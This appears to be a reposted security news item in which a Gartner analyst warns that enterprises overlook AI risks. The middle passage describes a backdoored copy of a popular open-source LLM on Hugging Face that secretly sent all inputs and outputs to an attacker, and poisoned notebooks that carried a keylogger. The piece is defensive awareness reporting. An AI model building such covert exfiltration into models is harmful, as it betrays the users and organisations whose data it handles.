Rebellious business divisions experimenting with artificial intelligence will obliterate the corporation prior to providing any assistance

Recently on LinkedIn, the seasoned Gartner analyst Avivah Litan (currently holding the title of Distinguished VP Analyst) discussed the cybersecurity risks associated with the utilization of artificial intelligence.

[…Keep reading]

Renegade business units trying out genAI will destroy the enterprise before they help

Recently on LinkedIn, the seasoned Gartner analyst Avivah Litan (currently holding the title of Distinguished VP Analyst) discussed the cybersecurity risks associated with the utilization of artificial intelligence. While her remarks were primarily directed at security professionals, the challenges she highlighted indeed present a significant issue for IT.

“Most Security Operations are oblivious to the presence of Enterprise AI, lacking the necessary tools to safeguard the implementation of AI,” she pointed out. “Conventional Appsec solutions prove insufficient when conducting vulnerability assessments on AI constructs. Notably, Security personnel are often excluded from enterprise AI development activities and have minimal interaction with data scientists and AI engineers. Meanwhile, malicious actors are actively introducing corrupted models into platforms like Hugging Face, establishing a new assault vector that many enterprises tend to overlook.

“Noma Security recently reported the discovery of a model downloaded by a customer that imitated a popular open-source LLM model. The assailant inserted a few lines of code that triggered a forward function. Despite this alteration, the model continued to function flawlessly, causing no suspicion among the data scientists. However, every input and output of the model was clandestinely redirected to the attacker, who managed to extract all the information. Furthermore, Noma identified a multitude of contaminated data science notebooks. In one instance, they encountered a keylogging module that clandestinely recorded all the activities performed on their customer’s Jupyter notebooks. Subsequently, the keylogger transmitted this information to an unidentified destination, eluding the Security team which had not flagged the Jupyter notebooks as a potential threat.”

About Author

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.